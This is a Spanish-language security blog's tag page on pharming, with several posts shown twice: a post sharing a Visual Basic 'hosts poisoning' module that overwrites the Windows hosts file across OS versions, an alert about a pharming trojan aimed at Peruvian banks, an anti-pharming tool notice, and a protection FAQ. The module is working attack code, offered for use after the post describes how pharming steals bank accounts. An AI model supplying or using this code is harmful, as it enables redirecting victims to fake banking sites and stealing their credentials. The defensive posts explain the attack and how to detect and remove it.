Backup Oficial de SeguridadBlanca.Org

Mostrando entradas con la etiqueta pharming. Mostrar todas las entradas
Mostrando entradas con la etiqueta pharming. Mostrar todas las entradas

viernes, 8 de enero de 2010

Hosts Poisoning T00l

Antes que todo quería pedir disculpas por escribir tan poco pero ando en época de examenes y pues no tengo tiempo de escribir pero ahora le quiero dar unos minutitos al blog para enseñarles esta t00l tan curiosa que he encontrado...


Dando Vueltas por blogs de malware y troyanos en general, lógico solo para mantenerme actualizado, di con que en Professional Hacker han puesto un módulo con el cual se puede hacer hosts poisoning, que quiero decir con hosts poisoning, ya hemos hablado antes sobre el pharming y esto es pharming, lo que hacemos es modificar el archivo /etc/hosts para que crean que al entrar en una página está todo bien sin embargo están navegando en un fake pero en el browser dice que están en la página real...


Esta técnica se usa para la estafa, la mayoría de veces para robo de cuentas bancarias, esta técnica como antes mencionado se llama pharming, ahora si, aquí podemos ver el ejemplo de un programa que usa lo mas común que es un bat pero lo que les voy a presentar es un módulo que he estado analizando y al parecer funciona a la perfección, lo digo por que los batch para hacer esta función en windows 7 y vista no funcionan bien, por eso el módulo que les daré es tan importante, tiene para hacerlo a windows 7 y windows vista.


el módulo solo te facilita el poder escribir ek módulo pero te da la opción de que hagas un programita con mas funciones...


El Code:


'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''' HOSTS POISONING MODULE BY XA0S '''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Creado por Xa0s '
' www.professional-hacker.org '
' Modulo encargado de editar el archivo Hosts de Windows '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function hosts(insertar As String, windows As String) As String
Dim w2 As String
If windows = 95 Then
w2 = "C:\Windows\hosts"
Else
If windows = 98 Then
w2 = "C:\Windows\hosts"
Else
If windows = "Me" Then
w2 = "C:\Windows\hosts"
Else
If windows = "NT" Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = 2000 Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = "XP" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = 2003 Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "Vista" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "7" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
MsgBox "Error de Sistema Operativo", vbCritical, "Hosts Poisoning Module By Xa0s"
Exit Function
End If
End If
End If
End If
End If
End If
End If
End If
End If
Open w2 For Output As #1
Print #1, "// Hosts Poisoning Module By Xa0s //"
Print #1, insertar
Close #1
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''' MODO DE USO ''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' call hosts(AQUI LO QUE QUIERAS ESCRIBIR EN EL HOSTS, SISTEMA OPERATIVO) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' El sistema operativo puede ser: '
'--- 95, 98, ME, 2000, NT, 2003, XP, VISTA, 7 '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''



en el mismo código se especifica mucho...


espero esto les sirva por que yo se los doy con esta idea pero ustedes pueden usarlo para escribir otros archivos, uno nunca sabe algo como esto le pueda servir.


PD: el código no se ve todo pero solo hagan copy paste de lo que se supone está y luego peguenlo en un bloc de notas o en el ide de visual y ya, les saldrá el código mas grande que es el real.

Saludos
Dr.White

martes, 11 de agosto de 2009

¡Atención! - Pharming en Bancos Peruanos

Se ha analizado un archivo ejecutable que realiza un ataque de pharming al descargar y ejecutar el archivo video.exe

El malware levanta un servicio de http en el equipo afectado y modifica el archivo de host para direccionar las peticiones bancarias a localhost, los portales afectados son los siguientes:

Levanta un proceso llamado msn.exe, para ser confundido con el messenger de microsoft, abre el puerto 80 (http), si el usuario ingresa en las páginas bancarias antes mencionadas, se direcciona a su mismo equipo.

Una vez que el usuario es engañado e ingresa su usuario y contraseña, el portal ficticio manda la información confidencial a otro sitio.

Hasta ahora el malware solo es identificado por las siguientes firmas antivirus:



Fuente: malware.unam.mx

Mi opinion: Sin miedo a el odio del creador de esto me gustaria recalcar que es un verdadero tarado por que usa simplmente hosts y ensima los redirecciona a Localhost es pobre de imaginación aquel que creo eso lo siento... pero es mi opinion...


Saludos
Dr.White

¡Atención! - Pharming en Bancos Peruanos

Se ha analizado un archivo ejecutable que realiza un ataque de pharming al descargar y ejecutar el archivo video.exe

El malware levanta un servicio de http en el equipo afectado y modifica el archivo de host para direccionar las peticiones bancarias a localhost, los portales afectados son los siguientes:

Levanta un proceso llamado msn.exe, para ser confundido con el messenger de microsoft, abre el puerto 80 (http), si el usuario ingresa en las páginas bancarias antes mencionadas, se direcciona a su mismo equipo.

Una vez que el usuario es engañado e ingresa su usuario y contraseña, el portal ficticio manda la información confidencial a otro sitio.

Hasta ahora el malware solo es identificado por las siguientes firmas antivirus:



Fuente: malware.unam.mx

Mi opinion: Sin miedo a el odio del creador de esto me gustaria recalcar que es un verdadero tarado por que usa simplmente hosts y ensima los redirecciona a Localhost es pobre de imaginación aquel que creo eso lo siento... pero es mi opinion...


Saludos
Dr.White

jueves, 11 de junio de 2009

Lo prometido es deuda

lectores les quería comentar que en estos dias no he podido escribir ya que tube faringitis pero ya estoy de vuelta y aquí les traigo la tool de evitar pharming osea de quitar las webs de pharming que esten en el archivo hosts...


Espero les sirva =) adentro esta la explicacion de como se usa...


PD: Se me olvidaba Decirles, mi code fue hecho gracias a un code que me dio Jbyte el es el verdadero Autor de esta tool.

Saludos
Dr.White

Lo prometido es deuda

lectores les quería comentar que en estos dias no he podido escribir ya que tube faringitis pero ya estoy de vuelta y aquí les traigo la tool de evitar pharming osea de quitar las webs de pharming que esten en el archivo hosts...


Espero les sirva =) adentro esta la explicacion de como se usa...


PD: Se me olvidaba Decirles, mi code fue hecho gracias a un code que me dio Jbyte el es el verdadero Autor de esta tool.

Saludos
Dr.White

domingo, 7 de junio de 2009

Pharming y como protegerse

1.- Que es el pharming?

El pharming es un estilo de ciberataque en el cual infectan las DNS o Editan el fichero "hosts" de las personas para que al entrar a una direccion IP o Dominio redireccione a una web que el atacante quiera.


2.- Como saber si soy victima de un ataque a las DNS?

antes yo puse un post de un programa que ayuda a verificar no solo los errores de tus DNS sino las malas configuraciones.

3.- y si me estan atacando por mi fichero hosts?

pues te tocaría ir al system32 y borrar todas las lineas que no van en un fichero hosts normal, pronto postearé un antivirus para este ataque...

4.- que me pueden hacer con un ataque de pharming?

pues digamos que ellos te infectan para que al entrar digamos a la web de tu banco que es www.banconacional.com te redireccione a www.scam-de-banconacional.ya.st pero en el momento de la redireccion tu barra de url seguirá diciendo www.banconacional.com , si ustedes llegan a poner sus datos ahi el atacante les habrá visto el usuario y contraseña de su cuenta bancaria online y con eso podrian gastarse su dinero.

5.- un poco mas...

la técnicas de ataque se les denomina pharming y a las de contra postura del pharming se les denomina anti-pharming y existen organizaciones que te explican mas detalladamente como funciona esto por ejemplo pueden visitar la web de un grupo anti-phishing

Saludos
Dr.White



Pharming y como protegerse

1.- Que es el pharming?

El pharming es un estilo de ciberataque en el cual infectan las DNS o Editan el fichero "hosts" de las personas para que al entrar a una direccion IP o Dominio redireccione a una web que el atacante quiera.


2.- Como saber si soy victima de un ataque a las DNS?

antes yo puse un post de un programa que ayuda a verificar no solo los errores de tus DNS sino las malas configuraciones.

3.- y si me estan atacando por mi fichero hosts?

pues te tocaría ir al system32 y borrar todas las lineas que no van en un fichero hosts normal, pronto postearé un antivirus para este ataque...

4.- que me pueden hacer con un ataque de pharming?

pues digamos que ellos te infectan para que al entrar digamos a la web de tu banco que es www.banconacional.com te redireccione a www.scam-de-banconacional.ya.st pero en el momento de la redireccion tu barra de url seguirá diciendo www.banconacional.com , si ustedes llegan a poner sus datos ahi el atacante les habrá visto el usuario y contraseña de su cuenta bancaria online y con eso podrian gastarse su dinero.

5.- un poco mas...

la técnicas de ataque se les denomina pharming y a las de contra postura del pharming se les denomina anti-pharming y existen organizaciones que te explican mas detalladamente como funciona esto por ejemplo pueden visitar la web de un grupo anti-phishing

Saludos
Dr.White